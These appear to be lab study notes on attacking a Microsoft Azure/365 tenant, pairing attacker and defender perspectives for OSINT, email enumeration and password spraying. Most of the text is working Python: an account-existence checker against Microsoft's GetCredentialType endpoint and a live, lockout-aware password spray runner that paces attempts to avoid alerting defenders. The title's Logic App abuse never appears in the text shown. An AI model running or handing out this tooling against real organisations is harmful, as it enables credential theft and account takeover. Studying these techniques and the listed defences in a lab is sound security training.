Abuse Azure Logic App Automation
Notes¶
Step 1: Open-Source Intelligence (OSINT)¶
- Attacker's Perspective:
  - Action: Found sensitive information (e.g., the DevTeamVM IP address and an Azure Subscription ID) in a screenshot attached to a LinkedIn post.
  - Rationale: Public social media posts often inadvertently leak sensitive organizational data.
  - Commands:
    - Research DNS records for the company's infrastructure:
      ```
      dig megabigtech.com +noall +answer ANY
      ```
      Many DNS servers now answer ANY with a minimal response (RFC 8482), so query MX, TXT and NS explicitly if ANY returns little.
    - Extract email address formats and infrastructure insights (e.g., MX records pointing at Microsoft 365 confirm which tenant to target).
- Defender's Perspective:
  - Vulnerability: Employees sharing sensitive screenshots or posts online.
  - Prevention:
    - Conduct regular security awareness training focusing on social media practices.
    - Implement Data Loss Prevention (DLP) solutions to monitor and block sensitive data exposure.
    - Use image-scanning tools to detect sensitive information in public posts.
  - Remediation:
    - Take down the post.
    - Conduct a risk assessment of the exposed information and treat the leaked host address and subscription ID as known to attackers.
Step 2: Email Enumeration¶
- Attacker's Perspective:
  - Action: Verified that the target email address exists using an enumeration tool.
  - Tool: o365enum
  - Command:
    ```
    python3 o365enum.py -u email.txt -m office.com
    ```
    `email.txt` holds one candidate address per line; `-m office.com` selects the check against the login.microsoftonline.com GetCredentialType endpoint.
  - Rationale: To confirm a valid attack target by enumerating Microsoft 365 email accounts before spending any password attempts.
- Defender's Perspective:
  - Vulnerability: Microsoft 365 sign-in responses reveal whether an account exists (the GetCredentialType response's IfExistsResult field differs for existing and non-existing users), so targets can be validated without submitting a single password.
  - Prevention:
    - Enable Azure AD (Entra ID) Smart Lockout so that the password guessing that follows enumeration is throttled; note that it does not suppress the existence check itself, which involves no password.
    - Use Conditional Access to limit access from suspicious IP ranges, reducing the value of any credentials obtained against enumerated accounts.
  - Remediation:
    - Review and enforce throttling of username validation requests.
    - Monitor sign-in activity for abnormal patterns, such as many distinct usernames from a single source in a short window.
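The check that o365enum's office.com mode performs, written out as an added example (not code from the original notes or from the o365enum project): it builds the GetCredentialType request body, classifies the IfExistsResult value the endpoint returns, and filters a candidate list down to the accounts worth spraying. The sample responses and the `*@megabigtech.com` usernames are constructed for the demonstration, so the offline run needs no network; `check_live()` sends the real request when called.

```python
import json
import urllib.request

# Endpoint behind o365enum's office.com mode; the username's existence is
# reported in the IfExistsResult field of the JSON response.
GET_CREDENTIAL_TYPE = "https://login.microsoftonline.com/common/GetCredentialType"

# IfExistsResult values as interpreted by o365enum: 0 and 6 are existing
# accounts, 5 is an existing account handled by another identity provider,
# 1 means the username is unknown to the tenant.
EXISTS_CODES = {0, 5, 6}
NOT_FOUND_CODE = 1


def build_request_body(username: str) -> bytes:
    """JSON body for the GetCredentialType check. Only Username is required;
    isOtherIdpSupported makes federated (code 5) accounts show up as existing."""
    return json.dumps({"Username": username, "isOtherIdpSupported": True}).encode()


def classify(response: dict) -> str:
    """Turn one GetCredentialType response into a verdict.

    A non-zero ThrottleStatus means the endpoint is rate-limiting us, so the
    IfExistsResult value cannot be trusted for that request."""
    if response.get("ThrottleStatus", 0) != 0:
        return "throttled"
    code = response.get("IfExistsResult")
    if code in EXISTS_CODES:
        return "exists"
    if code == NOT_FOUND_CODE:
        return "not-found"
    return "unknown"


def check_live(username: str, timeout: float = 10.0) -> str:
    """Send the real request (network access required; not used by the offline run)."""
    req = urllib.request.Request(
        GET_CREDENTIAL_TYPE,
        data=build_request_body(username),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return classify(json.load(resp))


def enumerate_offline(candidates, responses) -> dict:
    """Classify a candidate list against pre-recorded responses, keeping the
    per-username verdict so valid targets can be filtered out afterwards."""
    return {user: classify(responses.get(user, {})) for user in candidates}


def valid_targets(verdicts: dict) -> list:
    """The usernames worth spraying: those reported as existing."""
    return sorted(user for user, verdict in verdicts.items() if verdict == "exists")


# Constructed sample responses (illustrative; not captured from a real tenant).
SAMPLE_RESPONSES = {
    "alice@megabigtech.com": {"IfExistsResult": 0, "ThrottleStatus": 0},
    "bob@megabigtech.com": {"IfExistsResult": 1, "ThrottleStatus": 0},
    "carol@megabigtech.com": {"IfExistsResult": 5, "ThrottleStatus": 0},
    "dave@megabigtech.com": {"IfExistsResult": 0, "ThrottleStatus": 1},
}


if __name__ == "__main__":
    verdicts = enumerate_offline(SAMPLE_RESPONSES, SAMPLE_RESPONSES)
    for user, verdict in verdicts.items():
        print(f"{user}: {verdict}")
    print("targets:", valid_targets(verdicts))
```

The throttled case is the one to watch for: a throttled response is not a "not-found", and a tool that treats it as one silently drops valid targets. From the defender's side the same property cuts the other way: because no password is submitted, Smart Lockout never fires for this traffic, which is why the page's monitoring recommendation matters more than lockout for this step.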
Step 3: Password Spray¶
- Attacker's Perspective:
  - Action: Sprayed likely passwords (e.g., superRyan!) derived from the OSINT findings against the validated account.
  - Tool: o365spray
  - Command:
    ```
    python3 o365spray.py --spray --username [email protected] --passfile passwords.txt --domain megabigtech.com --lockout 1
    ```
    `--spray` selects spray mode and `--lockout` takes the lockout policy's reset window in minutes; the original command omitted the value, so the tool's default of 1 minute is shown here. Set it to match the target's actual lockout window so the spray does not lock accounts and alert the defenders.
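What `--lockout` buys you, as an added example that is neither the lab's code nor o365spray's: a lockout-aware spray scheduler around Entra ID's OAuth2 password grant (the endpoint o365spray's oauth2 module uses), plus the AADSTS error-code mapping that separates a wrong password from a correct one that merely hit MFA or Conditional Access. Assumptions: the client id shown is the Azure CLI's first-party public client; the usernames, passwords and fake verdicts in the demo are constructed. `attempt_login()` is the live call; `run_spray()` takes injectable `attempt` and `sleep` callables so the scheduling logic runs offline.

```python
import json
import time
import urllib.error
import urllib.parse
import urllib.request

# Resource-owner password grant endpoint. Assumption: a first-party public
# client id is used (this one is the Azure CLI's).
TOKEN_URL = "https://login.microsoftonline.com/common/oauth2/token"
CLIENT_ID = "04b07795-8ddb-461a-bbee-02f9e1bf7b46"

# AADSTS codes that tell a wrong password apart from correct credentials
# that were stopped later in the sign-in flow.
AADSTS_VERDICT = {
    "AADSTS50126": "invalid",   # invalid username or password
    "AADSTS50034": "no-user",   # user does not exist in the tenant
    "AADSTS50053": "locked",    # account locked (smart lockout)
    "AADSTS50057": "disabled",  # account disabled
    "AADSTS50055": "valid",     # password expired: the password was right
    "AADSTS50076": "valid",     # MFA required
    "AADSTS50079": "valid",     # MFA enrolment required
    "AADSTS50158": "valid",     # Conditional Access challenge
    "AADSTS53003": "valid",     # blocked by Conditional Access policy
}
FINAL = {"valid", "locked", "disabled", "no-user"}  # stop trying these users


def classify_error(error_description: str) -> str:
    """Map an error_description string from the token endpoint to a verdict."""
    for code, verdict in AADSTS_VERDICT.items():
        if code in error_description:
            return verdict
    return "unknown"


def attempt_login(username: str, password: str, timeout: float = 10.0) -> str:
    """One live ROPC attempt (network). Returns 'valid' on a token, else the verdict."""
    body = urllib.parse.urlencode({
        "grant_type": "password",
        "resource": "https://graph.microsoft.com",
        "client_id": CLIENT_ID,
        "username": username,
        "password": password,
    }).encode()
    req = urllib.request.Request(TOKEN_URL, data=body)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            json.load(resp)  # carries access_token on success
            return "valid"
    except urllib.error.HTTPError as err:
        try:
            description = json.load(err).get("error_description", "")
        except ValueError:
            description = ""
        return classify_error(description)


def plan_spray(users, passwords, attempts_per_window: int, window_minutes: int):
    """Order the spray so no account sees more than attempts_per_window failures
    inside one lockout window: one password per round across all users, and a
    pause of window_minutes after every attempts_per_window rounds."""
    rounds = []
    for i, password in enumerate(passwords):
        pause = window_minutes if i and i % attempts_per_window == 0 else 0
        rounds.append((pause, password, list(users)))
    return rounds


def run_spray(users, passwords, attempts_per_window=1, window_minutes=1,
              attempt=attempt_login, sleep=time.sleep) -> dict:
    """Execute the plan; stop touching an account once its verdict is final."""
    results = {}
    for pause, password, targets in plan_spray(users, passwords, attempts_per_window, window_minutes):
        if pause:
            sleep(pause * 60)
        for user in targets:
            if results.get(user) in FINAL:
                continue
            results[user] = attempt(user, password)
    return results


if __name__ == "__main__":
    # Constructed demo: only one user/password pair is "correct", no network used.
    secret = ("user2@megabigtech.com", "superRyan!")
    fake = lambda u, p: "valid" if (u, p) == secret else "invalid"
    print(run_spray(["user1@megabigtech.com", "user2@megabigtech.com"],
                    ["Summer2024!", "superRyan!", "Welcome1"],
                    attempts_per_window=2, window_minutes=5,
                    attempt=fake, sleep=lambda s: print(f"sleep {s}s")))
```

Two design points carry over to any spray tool: a "valid" verdict must include the MFA and Conditional Access codes, otherwise a correct password is logged as a failure, and an account that returns locked or disabled is removed from later rounds, since every further attempt against it is pure noise in the defender's sign-in logs.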
Links¶
https://learn.microsoft.com/en-us/connectors/office365users/#get-manager-(v2)